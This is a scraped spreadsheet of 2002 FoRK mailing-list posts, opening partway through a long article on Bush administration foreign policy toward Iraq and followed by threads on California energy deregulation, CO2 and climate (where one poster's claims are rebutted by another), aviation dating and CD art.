that it's going."It seems clear already that Rice will set forth the hope of a more dominant
American role in the world than she might have a couple of years ago. Some
questions that don't appear to be settled yet, but are obviously being
asked, are how much the United States is willing to operate alone in
foreign affairs, and how much change it is willing to try to engender
inside other countries-and to what end, and with what means. The leak a
couple of weeks ago of a new American nuclear posture, adding offensive
capability against "rogue states," departed from decades of official
adherence to a purely defensive position, and was just one indication of
the scope of the reconsideration that is going on. Is the United States now
in a position to be redrawing regional maps, especially in the Middle East,
and replacing governments by force? Nobody thought that the Bush
Administration would be thinking in such ambitious terms, but plainly it
is, and with the internal debate to the right of where it was only a few
months ago.Just before the 2000 election, a Republican foreign-policy figure suggested
to me that a good indication of a Bush Administration's direction in
foreign affairs would be who got a higher-ranking job, Paul Wolfowitz or
Richard Haass. Haass is another veteran of the first Bush Administration,
and an intellectual like Wolfowitz, but much more moderate. In 1997, he
published a book titled "The Reluctant Sheriff," in which he poked a little
fun at Wolfowitz's famous strategy briefing of the early nineties (he
called it the "Pentagon Paper") and disagreed with its idea that the United
States should try to be the world's only great power over the long term.
"For better or worse, such a goal is beyond our reach," Haass wrote. "It
simply is not doable." Elsewhere in the book, he disagreed with another of
the Wolfowitz team's main ideas, that of the United States expanding the
"democratic zone of peace": "Primacy is not to be confused with hegemony.
The United States cannot compel others to become more democratic." Haass
argued that the United States is becoming less dominant in the world, not
more, and suggested "a revival of what might be called traditional
great-power politics."Wolfowitz got a higher-ranking job than Haass: he is Deputy Secretary of
Defense, and Haass is Director of Policy Planning for the State Department-
in effect, Colin Powell's big-think guy. Recently, I went to see him in his
office at the State Department. On the wall of his waiting room was an
array of photographs of every past director of the policy-planning staff,
beginning with George Kennan, the father of the containment doctrine and
the first holder of the office that Haass now occupies.It's another indication of the way things are moving in Washington that
Haass seems to have become more hawkish. I mentioned the title of his book.
"Using the word 'reluctant' was itself reflective of a period when foreign
policy seemed secondary, and sacrificing for foreign policy was a hard case
to make," he said. "It was written when Bill Clinton was saying, 'It's the
economy, stupid'-not 'It's the world, stupid.' Two things are very
different now. One, the President has a much easier time making the case
that foreign policy matters. Second, at the top of the national-security
charts is this notion of weapons of mass destruction and terrorism."I asked Haass whether there is a doctrine emerging that is as broad as
Kennan's containment. "I think there is," he said. "What you're seeing from
this Administration is the emergence of a new principle or body of
ideas-I'm not sure it constitutes a doctrine-about what you might call the
limits of sovereignty. Sovereignty entails obligations. One is not to
massacre your own people. Another is not to support terrorism in any way.
If a government fails to meet these obligations, then it forfeits some of
the normal advantages of sovereignty, including the right to be left alone
inside your own territory. Other governments, including the United States,
gain the right to intervene. In the case of terrorism, this can even lead
to a right of preventive, or peremptory, self-defense. You essentially can
act in anticipation if you have grounds to think it's a question of when,
and not if, you're going to be attacked."Clearly, Haass was thinking of Iraq. "I don't think the American public
needs a lot of persuading about the evil that is Saddam Hussein," he said.
"Also, I'd fully expect the President and his chief lieutenants to make the
case. Public opinion can be changed. We'd be able to make the case that
this isn't a discretionary action but one done in self-defense."On the larger issue of the American role in the world, Haass was still
maintaining some distance from the hawks. He had made a speech not long
before called "Imperial America," but he told me that there is a big
difference between imperial and imperialist. "I just think that we have to
be a little bit careful," he said. "Great as our advantages are, there are
still limits. We have to have allies. We can't impose our ideas on
everyone. We don't want to be fighting wars alone, so we need others to
join us. American leadership, yes; but not American unilateralism. It has
to be multilateral. We can't win the war against terror alone. We can't
send forces everywhere. It really does have to be a collaborative endeavor."He stopped for a moment. "Is there a successor idea to containment? I think
there is," he said. "It is the idea of integration. The goal of U.S.
foreign policy should be to persuade the other major powers to sign on to
certain key ideas as to how the world should operate: opposition to
terrorism and weapons of mass destruction, support for free trade,
democracy, markets. Integration is about locking them into these policies
and then building institutions that lock them in even more."The first, but by no means the last, obvious manifestation of a new
American foreign policy will be the effort to remove Saddam Hussein. What
the United States does in an Iraq operation will very likely dwarf what's
been done so far in Afghanistan, both in terms of the scale of the
operation itself and in terms of its aftermath.Several weeks ago, Ahmad Chalabi, the head of the Iraqi National Congress,
the Iraqi opposition party, came through Washington with an entourage of
his aides. Chalabi went to the State Department and the White House to ask,
evidently successfully, for more American funding. His main public event
was a panel discussion at the American Enterprise Institute. Chalabi's
leading supporter in town, Richard Perle, the prominent hawk and former
Defense Department official, acted as moderator. Smiling and supremely
confident, Perle opened the discussion by saying, "Evidence is mounting
that the Administration is looking very carefully at strategies for dealing
with Saddam Hussein." The war on terrorism, he said, will not be complete
"until Saddam is successfully dealt with. And that means replacing his
regime. . . . That action will be taken, I have no doubt."Chalabi, who lives in London, is a charming, suave middle-aged man with a
twinkle in his eye. He was dressed in a double-breasted pin-striped suit
and a striped shirt with a white spread collar. Although he and his
supporters argue that the Iraqi National Congress, with sufficient American
support, can defeat Saddam just as the Northern Alliance defeated the
Taliban in Afghanistan, this view hasn't won over most people in
Washington. It isn't just that Chalabi doesn't look the part of a rebel
military leader ("He could fight you for the last petit four on the tray
over tea at the Savoy, but that's about it," one skeptical former Pentagon
official told me), or that he isn't in Iraq. It's also that Saddam's
military is perhaps ten times the size that the Taliban's was, and has been
quite successful at putting down revolts over the last decade. The United
States left Iraq in 1991 believing that Saddam might soon fall to an
internal rebellion; Chalabi's supporters believe that Saddam is much weaker
now, and that even signs that a serious operation was in the offing could
finish him off. But non-true believers seem to be coming around to the idea
that a military operation against Saddam would mean the deployment of
anywhere from a hundred thousand to three hundred thousand American ground
troops.Kenneth Pollack, a former C.I.A. analyst who was the National Security
Council's staff expert on Iraq during the last years of the Clinton
Administration, recently caused a stir in the foreign-policy world by
publishing an article in Foreign Affairs calling for war against Saddam.
This was noteworthy because three years ago Pollack and two co-authors
published an article, also in Foreign Affairs, arguing that the Iraqi
National Congress was incapable of defeating Saddam. Pollack still doesn't
think Chalabi can do the job. He believes that it would require a
substantial American ground, air, and sea force, closer in size to the one
we used in Kuwait in 1990-91 than to the one we are using now in
Afghanistan.Pollack, who is trim, quick, and crisp, is obviously a man who has given a
briefing or two in his day. When I went to see him at his office in
Washington, with a little encouragement he got out from behind his desk and
walked over to his office wall, where three maps of the Middle East were
hanging. "The only way to do it is a full-scale invasion," he said, using a
pen as a pointer. "We're talking about two grand corps, two to three
hundred thousand people altogether. The population is here, in the
Tigris-Euphrates valley." He pointed to the area between Baghdad and Basra.
"Ideally, you'd have the Saudis on board." He pointed to the Prince Sultan
airbase, near Riyadh. "You could make Kuwait the base, but it's much easier
in Saudi. You need to take western Iraq and southern Iraq"-pointing
again-"because otherwise they'll fire Scuds at Israel and at the Saudi oil
fields. You probably want to prevent Iraq from blowing up its own oil
fields, so troops have to occupy them. And you need troops to defend the
Kurds in northern Iraq." Point, point. "You go in as hard as you can, as
fast as you can." He slapped his hand on the top of his desk. "You get the
enemy to divide his forces, by threatening him in two places at once." His
hand hit the desk again, hard. "Then you crush him." Smack.That would be a reverberating blow. The United States has already removed
the government of one country, Afghanistan, the new government is obviously
shaky, and American military operations there are not completed. Pakistan,
which before September 11th clearly met the new test of national
unacceptability (it both harbors terrorists and has weapons of mass
destruction), will also require long-term attention, since the country is
not wholly under the control of the government, as the murder of Daniel
Pearl demonstrated, and even parts of the government, like the intelligence
service, may not be entirely under the control of the President. In Iraq,
if America invades and brings down Saddam, a new government must be
established-an enormous long-term task in a country where there is no
obvious, plausible new leader. The prospective Iraq operation has drawn
strong objections from the neighboring nations, one of which, Russia, is a
nuclear superpower. An invasion would have a huge effect on the internal
affairs of all the biggest Middle Eastern nations: Iran, Turkey, Saudi
Arabia, and even Egypt. Events have forced the Administration to become
directly involved in the Israeli-Palestinian conflict, as it hadn't wanted
to do. So it's really the entire region that is in play, in much the way
that Europe was immediately after the Second World War.In September, Bush rejected Paul Wolfowitz's recommendation of immediate
moves against Iraq. That the President seems to have changed his mind is an
indication, in part, of the bureaucratic skill of the Administration's
conservatives. "These guys are relentless," one former official, who is
close to the high command at the State Department, told me. "Resistance is
futile." The conservatives' other weapon, besides relentlessness, is
intellectualism. Colin Powell tends to think case by case, and since
September 11th the conservatives have outflanked him by producing at least
the beginning of a coherent, hawkish world view whose acceptance
practically requires invading Iraq. If the United States applies the
doctrines of Cheney's old Pentagon team, "shaping" and expanding "the zone
of democracy," the implications would extend far beyond that one operation.The outside experts on the Middle East who have the most credibility with
the Administration seem to be Bernard Lewis, of Princeton, and Fouad Ajami,
of the Johns Hopkins School of Advanced International Studies, both of whom
see the Arab Middle East as a region in need of radical remediation. Lewis
was invited to the White House in December to brief the senior
foreign-policy staff. "One point he made is, Look, in that part of the
world, nothing matters more than resolute will and force," the senior
official I had lunch with told me-in other words, the United States needn't
proceed gingerly for fear of inflaming the "Arab street," as long as it is
prepared to be strong. The senior official also recommended as interesting
thinkers on the Middle East Charles Hill, of Yale, who in a recent essay
declared, "Every regime of the Arab-Islamic world has proved a failure,"
and Reuel Marc Gerecht, of the American Enterprise Institute, who published
an article in The Weekly Standard about the need for a change of regime in
Iran and Syria. (Those goals, Gerecht told me when we spoke, could be
accomplished through pressure short of an invasion.)Several people I spoke with predicted that most, or even all, of the
nations that loudly oppose an invasion of Iraq would privately cheer it on,
if they felt certain that this time the Americans were really going to
finish the job. One purpose of Vice-President Cheney's recent diplomatic
tour of the region was to offer assurances on that matter, while gamely
absorbing all the public criticism of an Iraq operation. In any event, the
Administration appears to be committed to acting forcefully in advance of
the world's approval. When I spoke to Condoleezza Rice, she said that the
United States should assemble "coalitions of the willing" to support its
actions, rather than feel it has to work within the existing infrastructure
of international treaties and organizations. An invasion of Iraq would test
that policy in more ways than one: the Administration would be betting that
it can continue to eliminate Al Qaeda cells in countries that publicly
opposed the Iraq operation.When the Administration submitted its budget earlier this year, it asked
for a forty-eight-billion-dollar increase in defense spending for fiscal
2003, which begins in October, 2002. Much of that sum would go to improve
military pay and benefits, but ten billion dollars of it is designated as
an unspecified contingency fund for further operations in the war on
terrorism. That's probably at least the initial funding for an invasion of
Iraq.This spring, the Administration will be talking to other countries about
the invasion, trying to secure basing and overflight privileges, while Bush
builds up a rhetorical case for it by giving speeches about the
unacceptability of developing weapons of mass destruction. A drama
involving weapons inspections in Iraq will play itself out over the spring
and summer, and will end with the United States declaring that the terms
that Saddam offers for the inspections, involving delays and restrictions,
are unacceptable. Then, probably in the late summer or early fall, the
enormous troop positioning, which will take months, will begin. The
Administration obviously feels confident that the United States can
effectively parry whatever aggressive actions Saddam takes during the troop
buildup, and hopes that its moves will destabilize Iraq enough to cause the
Republican Guard, the military key to the country, to turn against Saddam
and topple him on its own. But the chain of events leading inexorably to a
full-scale American invasion, if it hasn't already begun, evidently will
begin soon.Lewis (Scooter) Libby, who was the principal drafter of Cheney's
future-of-the-world documents during the first Bush Administration, now
works in an office in the Old Executive Office Building, overlooking the
West Wing, where he has a second, smaller office. A packet of
public-relations material prompted by the recent paperback publication of
his 1996 novel, "The Apprentice," quotes the Times' calling him "Dick
Cheney's Dick Cheney," which seems like an apt description: he appears
absolutely sure of himself, and, whether by coincidence or as a result of
the influence of his boss, speaks in a tough, confidential, gravelly
rumble. Like Condoleezza Rice and Bush himself, he gives the impression of
having calmly accepted the idea that the project of war and reconstruction
which the Administration has now taken on may be a little exhausting for
those charged with carrying it out but is unquestionably right, the only
truly prudent course.When I went to see Libby, not long ago, I asked him whether, before
September 11th, American policy toward terrorism should have been
different. He went to his desk and got out a large black loose-leaf binder,
filled with typewritten sheets interspersed with foldout maps of the Middle
East. He looked through it for a long minute, formulating his answer."Let us stack it up," he said at last. "Somalia, 1993; 1994, the discovery
of the Al Qaeda-related plot in the Philippines; 1993, the World Trade
Center, first bombing; 1993, the attempt to assassinate President Bush,
former President Bush, and the lack of response to that, the lack of a
serious response to that; 1995, the Riyadh bombing; 1996, the Khobar
bombing; 1998, the Kenyan embassy bombing and the Tanzanian embassy
bombing; 1999, the plot to launch millennium attacks; 2000, the bombing of
the Cole. Throughout this period, infractions on inspections by the Iraqis,
and eventually the withdrawal of the entire inspection regime; and the
failure to respond significantly to Iraqi incursions in the Kurdish areas.
No one would say these challenges posed easy problems, but if you take that
long list and you ask, 'Did we respond in a way which discouraged people
from supporting terrorist activities, or activities clearly against our
interests? Did we help to shape the environment in a way which discouraged
further aggressions against U.S. interests?,' many observers conclude no,
and ask whether it was then easier for someone like Osama bin Laden to rise
up and say credibly, 'The Americans don't have the stomach to defend
themselves. They won't take casualties to defend their interests. They are
morally weak.' "Libby insisted that the American response to September 11th has not been
standard or foreordained. "Look at what the President has done in
Afghanistan," he said, "and look at his speech to the joint session of
Congress"-meaning the State of the Union Message, in January. "He made it
clear that it's an important area. He made it clear that we believe in
expanding the zone of democracy even in this difficult part of the world.
He made it clear that we stand by our friends and defend our interests. And
he had the courage to identify those states which present a problem, and to
begin to build consensus for action that would need to be taken if there is
not a change of behavior on their part. Take the Afghan case, for example.
There are many other courses that t</t>
  </si>
  <si>
    <t>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t>
  </si>
  <si>
    <t>---------- Forwarded message ----------
Date: Mon, 23 Sep 2002 09:52:44 -0700
From: mis@seiden.com
Subject: Re: [s-t] Scoot boss's wife orders hit.
the "independent", a shopper's newspaper in the sf bay area, (the
operational definition of that media category is "no matter how hard
you try you can't get them to stop delivering it") had this story on
aug 24, 2002:"Dot-com downturn linked to domestic violence"Domestic-violence worker Kathy Black remembers watching the Nasdaq 
take a nastydive on MSNBC, in March 2000."I knew then that we would have a lot of work on our hands," Black said,
referring to the caseload at La Casa de las Madres, the city's largest
organization serving women and children affected by domestic violence.She was right.Calls to La Casa's crisis line increased by 33% in the last financial
year, and the service saw a 10 percent increase in the demand for
beds, with 232 women and 215 children utilizing the shelter service.
...Black said the dot-com collapse and a growing awareness of La Casa's
services were the two main reasons for the increase in calls.She said many of her clients had partners who were employed in
service-industry jobs utilized by dot-com workers   
...On Mon, Sep 23, 2002 at 04:23:17PM +0100, Gordon Joly wrote:
&gt; 
&gt; 
&gt; 
&gt; http://news.bbc.co.uk/1/low/england/2276467.stm
&gt; 
&gt; 
&gt; Woman admits trying to hire hitman
&gt; 
&gt; The former wife of an internet tycoon has admitted trying to hire a 
&gt; hitman to kill him after the breakdown of their 21-year marriage.
&gt; 
&gt; 
&gt; -- 
&gt; Linux User No. 256022///
&gt; http://pobox.com/~gordo/
&gt; gordon.joly@pobox.com///</t>
  </si>
  <si>
    <t xml:space="preserve">
Yes, it is.  You just want to be called a liberal when you really
aren't.&gt; -----Original Message-----
&gt; From: Geege Schuman [mailto:geege@barrera.org]
&gt; Sent: Tuesday, September 24, 2002 5:12 AM
&gt; To: johnhall@evergo.net; FoRK
&gt; Subject: RE: liberal defnitions
&gt; 
&gt; per john hall:
&gt; "The opinion that EITHER we are spending too much OR we have too much
&gt; regulation is pretty
&gt; much anathema to liberal politics."
&gt; 
&gt; no it's not.
&gt; 
&gt; geege
&gt; 
&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">
In a message dated 9/24/2002 11:24:58 AM, jamesr@best.com writes:&gt;This situation wouldn't have happened in the first place if California
&gt;didn't have economically insane regulations.  They created a regulatory
&gt;climate that facilitated this.  So yes, it is the product of
&gt;over-regulation.
&gt;Which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don't work well when situations are fluid or 
ambiguous. But I don't think that the misbehavior of energy companies in 
California can properly be called well-intentioned lawbreaking by parties who 
were trying to do the right thing but could do so only by falling afoul of 
some technicality.)If you want to get to root causes, we should probably go to the slaying of 
Abel by Cain. Perhaps we can figure out what went wrong then, and roll our 
learning forward through history and create a FoRKtopia.Nonpartisanly, which is to say casting stones on all houses, whether 
bicameral or unicameral, built on sand or on rock, to the left of them or to 
the right of them, of glass or brick or twig or straw, Tom
</t>
  </si>
  <si>
    <t>On Mon, 2002-09-23 at 13:53, Jim Whitehead wrote:
&gt; 
&gt; You have not explained why the increase in CO2 concentrations is not
&gt; contributing to increasing global temperature.
There are a number of reasons to think that CO2 is not important to
controlling global temperature and that much of the CO2 increase may not
be anthropogenic. Some recent research points worth mentioning:Recent high-resolution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don't believe anyone really has an
authoritative answer as to exactly how this works yet.With respect to absolute CO2 concentrations, it is also important to
point out that our best data to date suggests that they follow a fairly
regular cycle with a period of about 100,000 years.  At previous cycle
peaks, the concentrations were similar to what they are now.  If this
cycle has any validity (and we only have good data for 4-5 complete
cyclical periods, but which look surprisingly regular in shape and
time), then we should be almost exactly at a peak right now.  As it
happens, current CO2 concentrations are within 10%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concentrations.Also, CO2 levels interact with the biosphere in a manner that ultimately
affects temperature.  Again, the interaction is not entirely
predictable, but this is believed to be one of the regulating negative
feedback systems mentioned above.Last, as greenhouse gases go, CO2 isn't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biosphere.CO2 was an easy mark for early environmentalism, but all the recent
studies and data I've seen gives me the impression that it is largely a
passenger on the climate ride rather than the driver.  I certainly don't
think it is a healthy fixation if we're actually interested in
understanding warming trends.Cheers,-James Rogers
 jamesr@best.com</t>
  </si>
  <si>
    <t xml:space="preserve">
Read the article.  I'm afraid I don't understand how the transmission
prices could have hit $50/tcf.But I'm also really leery of telling a pipeline company they have to run
a pipeline at a higher pressure and that they should forego maintenance.
We had a big pipeline explosion up here awhile ago.So maybe the judge has a point.  We'll see as the appeals work its way
out.&gt; -----Original Message-----
&gt; From: Geege Schuman [mailto:geege@barrera.org]
&gt; Sent: Tuesday, September 24, 2002 5:16 AM
&gt; To: johnhall@evergo.net
&gt; Subject: RE: liberal defnitions
&gt; 
&gt; from slate's "today's papers":  The New York Times and Los Angeles
Times
&gt;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&gt; 
&gt; -----Original Message-----
&gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of
John
&gt; Hall
&gt; Sent: Monday, September 23, 2002 11:57 PM
&gt; To: FoRK
&gt; Subject: liberal defnitions
&gt; 
&gt; 
&gt; Depends on how much over spending vs. how much (and what type) over
&gt; regulation.
&gt; 
&gt; The biggest problem with over regulation is the costs can be
invisible.
&gt; It also has the ability to single out particular people, while over
&gt; spending spreads the damage more evenly.  Rent control would be an
&gt; example of a regulation solution that is in general worse than
spending
&gt; tons of money on public housing.
&gt; 
&gt; As for the definition of a liberal being someone who seeks to impose
&gt; both, I find no fault in that definition whatsoever.  The opinion that
&gt; EITHER we are spending too much OR we have too much regulation is
pretty
&gt; much anathema to liberal politics.
&gt; 
&gt; Finally, those who argue that there are private replacements for much
&gt; government regulation are not saying that a state of nature (no
private
&gt; replacements, no government regulation) is better than government
&gt; regulation itself.
&gt; 
&gt; And in my experience people who label themselves 'Green' (which does
not
&gt; include everyone who loves trees and thinks smokestacks are ugly) is a
&gt; watermelon.
&gt; 
&gt; 
&gt; 
&gt; 
&gt; &gt; -----Original Message-----
&gt; &gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of
&gt; Geege
&gt; &gt; Schuman
&gt; &gt;
&gt; &gt; funny. i read it as green = red, as in accounting, as in fiscally
&gt; &gt; irresponsible.  which do you think is the worse indictment -
&gt; &gt; overregulation
&gt; &gt; or overspending?  there are many (dickheads) who buy into the
&gt; &gt; neo-conservative media's (fox's) definiton of "liberal" as "one who
&gt; seeks
&gt; &gt; to
&gt; &gt; impose both."
&gt; 
&gt; 
&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">&gt; Proving, once again, that aviators get all the chicks...Just as long as they have the wherewithal
for avgas, anyway.I think Turpin once calculated that one
could do a decent amount of messing about
for about $30K of boat and $12K/year in
living expenses.What are the equivalent figures for live
aboard aircraft?-Dave(How difficult would it be to find the
harbormaster, after mooring to the top
of the Empire State Building?)
</t>
  </si>
  <si>
    <t xml:space="preserve">O utensils of the world --I wonder if it is possible to reverse-engineer the Reed-Solomon 
error-correcting codes to create a bytestream such that, when burned 
onto a CD, you can make out a picture in the diffraction pattern?I suppose this is a modern equivalent to line-printer artwork; I was 
imagining using a CD-RW drive to use the outer track, say, to spell out 
the disc title, creation time, etc. It would sure beat feeding CDs 
through a laser printer :-)Rohit
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, 24 Sep 2002, Rohit Khare wrote:&gt; I suppose this is a modern equivalent to line-printer artwork; I was 
&gt; imagining using a CD-RW drive to use the outer track, say, to spell out 
&gt; the disc title, creation time, etc. It would sure beat feeding CDs 
&gt; through a laser printer :-)There are commercial burners which can be labeled that way. Patterns in 
the unburnt section.
</t>
  </si>
  <si>
    <t xml:space="preserve">Righ, somebody. Reminds me of the old Divorced Man's exposition of what
happened to him."First, you get a ring. Then you give it away. Then, you get a house. And
you give *that* away...."Just kidding, Darling...;-).Cheers,
RAH
Who, um, doesn't own a house...
--- begin forwarded text
Date: Tue, 24 Sep 2002 20:12:12 -0400
From: Somebody
To: "R. A. Hettinga" 
Subject: Re: SF Weekly's Ultimate SF Date lineup :-)Bob,    Living aboard a Cessna 172 would be challenging, but I did meet a
couple at an airshow in Point Mugu in 1995 or so that had converted an
old seaplane (it was a bit larger than a PBY, I think) to something of a
floating, flying RV.  They visited a lot of airshows and covered a lot of
miles.  I'm sure maintenance (on a 50+ year old airframe), fuel (for two
large radial engines) insurance and other costs were out of my price
range, but what a hoot!    On a more realistic note, the flight to Half Moon bay was probably 2
hours of flight time at about  $75/hour in the Cessna.  Not exactly a
cheap date, but that's nothing compared to the money I've spent on her
since.  (And loved every minute of it, Darling!!)        
"R. A. Hettinga" wrote:&gt; --- begin forwarded text
&gt;
&gt; Status: RO
&gt; Delivered-To: fork@spamassassin.taint.org
&gt; To: fork@spamassassin.taint.org
&gt; Subject: Re: SF Weekly's Ultimate SF Date lineup :-)
&gt; From: Dave Long 
&gt; Sender: fork-admin@xent.com
&gt; Date: Tue, 24 Sep 2002 13:28:04 -0700
&gt;
&gt; &gt; Proving, once again, that aviators get all the chicks...
&gt;
&gt; Just as long as they have the wherewithal
&gt; for avgas, anyway.
&gt;
&gt; I think Turpin once calculated that one
&gt; could do a decent amount of messing about
&gt; for about $30K of boat and $12K/year in
&gt; living expenses.
&gt;
&gt; What are the equivalent figures for live
&gt; aboard aircraft?
&gt;
&gt; -Dave
&gt;
&gt; (How difficult would it be to find the
&gt; harbormaster, after mooring to the top
&gt; of the Empire State Building?)
&gt;
&gt; --- end forwarded text
&gt;
&gt; --
&gt; -----------------
&gt; R. A. Hettinga 
&gt; The Internet Bearer Underwriting Corporation 
&gt; 44 Farquhar Street, Boston, MA 02131 USA
&gt; "... however it may deserve respect for its usefulness and antiquity,
&gt; [predicting the end of the world] has not been found agreeable to
&gt; experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'---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</si>
  <si>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Anyone heard of this law before?&gt; Q. Can I get a playlist?
&gt; A. We are unable to offer a playlist. The Digital Performance Right in 
&gt; Sound Recordings Act of 1995 passed by Congress prevents us from 
&gt; disclosing such information. The Digital Law states that if one is 
&gt; transmitting a digital signal, song information cannot be 
&gt; pre-announced. It is a Music Choice policy not to release a playlist of 
&gt; upcoming or previously played songs.Recently, MusicChoice upgraded their website with a very important 
service, as far as I'm concerned: real-time song info from their 
website. My DirecTV receiver is up on a shelf (and its display scrolls 
intermittently); and I'm surely not going to fire up my projector while 
listening to the "radio", so I'm quite happy that I can retrieve r/t 
song info with URLs like:http://backstage.musicchoice.com/songid/channels/soundsoftheseasons.asp
http://backstage.musicchoice.com/songid/channels/rap.asp
http://backstage.musicchoice.com/songid/channels/opera.asp
etc...Now, if I were a more eager hacker, I'd write up little WSDL stubs for 
these event streams (they're clearly not worried about load, since their 
own web pages specify 15 sec meta-refresh) and then feed 'em through a 
content router to alert me to cool songs. Heck, cross-reference the 
service to CDDB and... :-)RK
</t>
  </si>
  <si>
    <t xml:space="preserve">Russell Turpin wrote:
&gt;Invite her for an afternoon cruise under the Golden Gate bridge in
&gt;your Stonehorse day sailor.Sounds good.
&gt;Under way, ask her if she'd like to take the stick.Whoah!  That's a rather direct approach!
R. A. Hettinga quoted:
&gt;From: Somebody
&gt;[...] what I did in 1983 was to rent a plane from the Moffett Field
&gt;flying club and take her on an aerial tourSounds great.
&gt;I can't recall whether or not I gave her any stick time.Can't remember if he's in the mile-high club?  Even worse!!!
R
</t>
  </si>
  <si>
    <t>&gt; The only circumstances in which a business will not be ready--indeed,
&gt; eager--to do an additional volume of business is if it is physically unable
&gt; to do so because it lacks the necessary physical means of doing so, or
&gt; because the costs it incurs in doing so exceed the additional sales revenue
&gt; it will receive.That is a fully retarded view of economics, and pretty much the same kind
of clueless oversimplication that led to the blackouts.  There are a
bazillion factors that affect game strategies, which is what the state of
California messed up and the energy producers exploited.I'm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doesn't suck?  
If there does exist a better set of rules, then reregulation isn't
necessarily the answer.You can't blame businesses for being profit maximizers.  Yes, the people 
involved were heartless and corrupt.  But mainly they just did their 
jobs.The guilty parties are either the mathematicians and economists who wrote
the rules or, if the mathematicians and economists said there were no good
rules, pro-deregulation politicians who went ahead anyway.- Lucas</t>
  </si>
  <si>
    <t xml:space="preserve">
--- begin forwarded text
Date: Wed, 25 Sep 2002 13:57:15 -0400
To: Digital Bearer Settlement List 
From: "R. A. Hettinga" 
Subject: California needs intelligent energy deregulation
Sender: http://www.siliconvalley.com/mld/siliconvalley/4144696.htm?template=contentModules/printstory.jspPosted on Tue, Sep. 24, 2002
Dan Gillmor: State needs intelligent energy deregulationBy Dan Gillmor
Mercury News Technology ColumnistThe facts were trade and government secrets at the time. But the energy
industry failed the smell test in 2000 and 2001 as it tried to justify
soaring wholesale electricity and natural-gas prices in California.Now, as investigators and regulators unravel the reasons for a financial
and fiscal mess we'll be cleaning up for decades, we're learning what
everyone suspected. Market games helped engineer the price spikes.The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congestion.''How much of this was illegal, as opposed to simply amoral, remains to be
seen. Unfortunately, California's response -- confusion, lawsuits and
policy tweaks -- hasn't been sufficient.More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sources.If the lawsuits against various energy companies and traders bear any
fruit, the best we can expect is to pay off some of the massive debts the
state amassed to prevent a total collapse in early 2001. That's a
reasonable approach, but don't expect miracles.State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(www.ceert.org).It's tempting to call for an outright state takeover of the utilities --
tempting but a bad idea. When there's genuine competition, as we could
achieve in electricity generation, the private sector tends to do a better
job. Instead of abandoning deregulation, California should find a way to
inject real competition into the market.We do need to recognize that the current system of delivering electricity
defies privatization, at least under current conditions. Smart regulation
is essential.But the best response to gouging is to use less of what the gougers
control. There are two ways: conservation and replacement. We need more of
both.The best recent step is a new state law that slowly but surely ratchets up
the use of electricity from renewables. By 2017, California's utilities
will have to get 20 percent of their power from solar and other renewable
sources. Several power companies are expected to do this even sooner.But this law has an element of old-line thinking, the captive-customer
model we need to be getting away from, not sustaining. Lip service to newer
ideas isn't enough.The state should be removing barriers to micro-generation systems, small
generators that can run on a variety of fuels and provide decentralized,
harder-to-disrupt electricity to homes and businesses. This technology is
coming along fast. State policies are not keeping pace.Investing to save energy is increasingly the smartest move of all.
California should be doing more to encourage this, whether through tax
incentives or outright grants in low-income households. California hasn't
done badly on conservation in a general sense, and energy customers did
react to last year's soaring rates and blackouts by cutting back, but it's
lunacy to wait for the next crisis when we can do something to avoid it
altogether.Maybe this is all pointless. The Bush administration's energy policies, so
grossly tilted toward the unholy trinity of oil, coal and nuclear, are
making us all more vulnerable. Never mind what might happen if the coming
war in Iraq goes badly.It's pointless to hope for a sane federal policy -- a crash program to
drastically speed the inevitable transition to a hydrogen-based energy
system. But the largest state, one of the world's major economies in its
own right, does have some clout. We can hit the rip-off artists where it
hurts, and protect ourselves from even more serious disruptions. Maybe next
year.--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</si>
  <si>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OK, let's bring some data into the discussion:
http://www.grida.no/climate/vital/02.htm
(A graph, derived from Vostok ice core samples, of CO2 and temperature
fluctuations over the past 400k years).&gt; Recent high-resolution studies of historical CO2 concentrations and
&gt; temperatures over hundreds of thousands of years have shown a modest
&gt; correlation between the two. In a number of cases, CO2 level increases
&gt; are not in phase with temperature increases and actually trail the
&gt; increase in temperature by a short time i.e. increases in temperature
&gt; preceded increases in CO2 concentrations. The more studies that are done
&gt; of the geological record, the more it seems that CO2 concentrations are
&gt; correlated with temperature increases, but are not significantly
&gt; causative.Based on the Vostok data, you are right, there is a very strong correlation
between temperature and CO2 concentrations, but it doesn't always appear to
be causal.&gt; With respect to absolute CO2 concentrations, it is also important to
&gt; point out that our best data to date suggests that they follow a fairly
&gt; regular cycle with a period of about 100,000 years.Also correct -- the peak of each cycle is at about 290-300 ppm CO2.&gt; As it
&gt; happens, current CO2 concentrations are within 10% of other previous
&gt; cyclical concentration peaks for which we have good data.Not correct. Mauna Loa data  and
 show that the current CO2
concentrations are at 370ppm, 18% *greater* than the *highest* recorded
value from the past 400k years. Furthermore, CO2 concentrations are growing
at 15ppm every 10 years, much faster than any recorded increase in the
Vostok data (though perhaps the Vostok data isn't capable of such fine
resolution).&gt; In other words, we may be adding to the CO2 levels,No, we are *definitely* adding to CO2 levels. Look at the following chart:
http://www.grida.no/climate/vital/07.htm
(Shows CO2 concentrations since 1870, the "historical record").Not only is the CO2 increase over 130 years unprecedented in the Vostok
record, it is clear that the rate of change is *increasing*, not decreasing.
There is no other compelling explanation for this increase, except for
anthropogenic input. You're really out on the fringe if you're debating
this -- even global warming skeptics generally concede this point.&gt; but it looks a lot like we
&gt; would be building a molehill on top of a mountain in the historical
&gt; record.  At the very least, there is nothing anomalous about current CO2
&gt; concentrations.Wrong again. Current CO2 levels are currently unprecedented over the past
400k years, unless there is some mechanism that allows CO2 levels to quickly
spike, and then return back to "normal" background levels (and hence the
spike might not show up in the ice cores).Still, by around 2075-2100 we will have reached 500 ppm CO2, a level that
even you would have a hard time arguing away.&gt; Also, CO2 levels interact with the biosphere in a manner that ultimately
&gt; affects temperature.  Again, the interaction is not entirely
&gt; predictable, but this is believed to be one of the regulating negative
&gt; feedback systems mentioned above.Yes, clouds and oceans are a big unknown. Still, we know ocean water has a
finite capacity to store CO2, and if the world temperature doesn't increase,
but we all have Seattle-like weather all the time, the effects would be
enormous.&gt; Last, as greenhouse gases go, CO2 isn't particularly potent, although it
&gt; makes up for it in volume in some cases.  Gases such as water and
&gt; methane have a far greater impact as greenhouse gases on a per molecule
